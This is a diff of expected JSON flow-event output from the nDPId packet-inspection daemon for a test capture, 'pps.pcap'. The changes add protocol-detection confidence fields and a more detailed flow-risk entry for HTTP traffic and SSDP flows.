-00607{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353136757,"flow_last_seen":1467353136757,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65125,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00643{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353136757,"flow_last_seen":1467353136757,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65125,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00568{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353136757,"flow_last_seen":1467353136757,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65125,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353159222,"flow_last_seen":1467353159428,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":581,"flow_avg_l4_payload_len":290,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65127,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00644{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353181295,"flow_last_seen":1467353181515,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":589,"flow_avg_l4_payload_len":294,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65128,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353159222,"flow_last_seen":1467353159428,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":581,"flow_avg_l4_payload_len":290,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65127,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00670{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353181295,"flow_last_seen":1467353181515,"flow_idle_time":7440000,"flow_min_l4_payload_len":265,"flow_max_l4_payload_len":324,"flow_tot_l4_payload_len":589,"flow_avg_l4_payload_len":294,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.15","dst_ip":"68.233.253.133","src_port":65128,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
 00589{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.26.74.190","src_port":22793,"dst_port":1037,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00574{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"222.26.74.190","src_port":22793,"dst_port":1037,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.44.232.243","src_port":22793,"dst_port":21044,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136835,"flow_last_seen":1467353136835,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.44.232.243","src_port":22793,"dst_port":21044,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1467353136835,"flow_last_seen":1467353136836,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":86,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"1.169.136.116","src_port":22793,"dst_port":17951,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1467353136835,"flow_last_seen":1467353136836,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":344,"flow_avg_l4_payload_len":86,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"1.169.136.116","src_port":22793,"dst_port":17951,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139305,"flow_last_seen":1467353139309,"flow_idle_time":7440000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":759,"flow_tot_l4_payload_len":985,"flow_avg_l4_payload_len":492,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.24","src_port":50466,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353139305,"flow_last_seen":1467353139309,"flow_idle_time":7440000,"flow_min_l4_payload_len":226,"flow_max_l4_payload_len":759,"flow_tot_l4_payload_len":985,"flow_avg_l4_payload_len":492,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"203.66.182.24","src_port":50466,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"Web"}}
 00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136838,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"220.130.154.23","src_port":22793,"dst_port":35941,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136838,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"220.130.154.23","src_port":22793,"dst_port":35941,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353152692,"flow_last_seen":1467353167734,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":798,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":59648,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353156641,"flow_last_seen":1467353156700,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2184,"flow_avg_l4_payload_len":728,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50488,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1467353152692,"flow_last_seen":1467353167734,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":798,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":59648,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353156641,"flow_last_seen":1467353156700,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":2184,"flow_avg_l4_payload_len":728,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50488,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
 00582{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":27,"flow_first_seen":1467353157138,"flow_last_seen":1467353157157,"flow_idle_time":7440000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":32840,"flow_avg_l4_payload_len":1216,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353157509,"flow_last_seen":1467353159746,"flow_idle_time":7440000,"flow_min_l4_payload_len":376,"flow_max_l4_payload_len":403,"flow_tot_l4_payload_len":1168,"flow_avg_l4_payload_len":389,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12":"HTTP Numeric IP Address"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
-00657{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":246,"flow_first_seen":1467353189325,"flow_last_seen":1467353189439,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":306749,"flow_avg_l4_payload_len":1246,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50505,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353190040,"flow_last_seen":1467353190044,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":1009,"flow_tot_l4_payload_len":1167,"flow_avg_l4_payload_len":583,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50507,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00650{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353190634,"flow_last_seen":1467353190638,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":366,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":255,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00797{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353157509,"flow_last_seen":1467353159746,"flow_idle_time":7440000,"flow_min_l4_payload_len":376,"flow_max_l4_payload_len":403,"flow_tot_l4_payload_len":1168,"flow_avg_l4_payload_len":389,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50494,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}}
+00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":81,"flow_state":"finished","flow_packets_processed":246,"flow_first_seen":1467353189325,"flow_last_seen":1467353189439,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":306749,"flow_avg_l4_payload_len":1246,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50505,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353190040,"flow_last_seen":1467353190044,"flow_idle_time":7440000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":1009,"flow_tot_l4_payload_len":1167,"flow_avg_l4_payload_len":583,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50507,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353190634,"flow_last_seen":1467353190638,"flow_idle_time":7440000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":366,"flow_tot_l4_payload_len":510,"flow_avg_l4_payload_len":255,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.19","src_port":50508,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
 00590{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.47.91.129","src_port":22793,"dst_port":22576,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
 00575{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"114.47.91.129","src_port":22793,"dst_port":22576,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353138757,"flow_last_seen":1467353138794,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":566,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50463,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1467353140755,"flow_last_seen":1467353140794,"flow_idle_time":7440000,"flow_min_l4_payload_len":602,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":4283,"flow_avg_l4_payload_len":856,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.32.39","src_port":50476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353165456,"flow_last_seen":1467353165492,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":566,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50496,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353160157,"flow_last_seen":1467353163154,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":63930,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
-00645{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":39383,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353138757,"flow_last_seen":1467353138794,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":566,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50463,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1467353140755,"flow_last_seen":1467353140794,"flow_idle_time":7440000,"flow_min_l4_payload_len":602,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":4283,"flow_avg_l4_payload_len":856,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.32.39","src_port":50476,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353165456,"flow_last_seen":1467353165492,"flow_idle_time":7440000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1699,"flow_avg_l4_payload_len":566,"midstream":1,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"101.227.200.11","src_port":50496,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353160157,"flow_last_seen":1467353163154,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":274,"flow_avg_l4_payload_len":137,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.48","dst_ip":"239.255.255.250","src_port":63930,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
+00671{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":180000,"flow_min_l4_payload_len":88,"flow_max_l4_payload_len":88,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":88,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":39383,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}}
 00590{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136439,"flow_last_seen":1467353136440,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":74,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.249.53.196","src_port":22793,"dst_port":32443,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
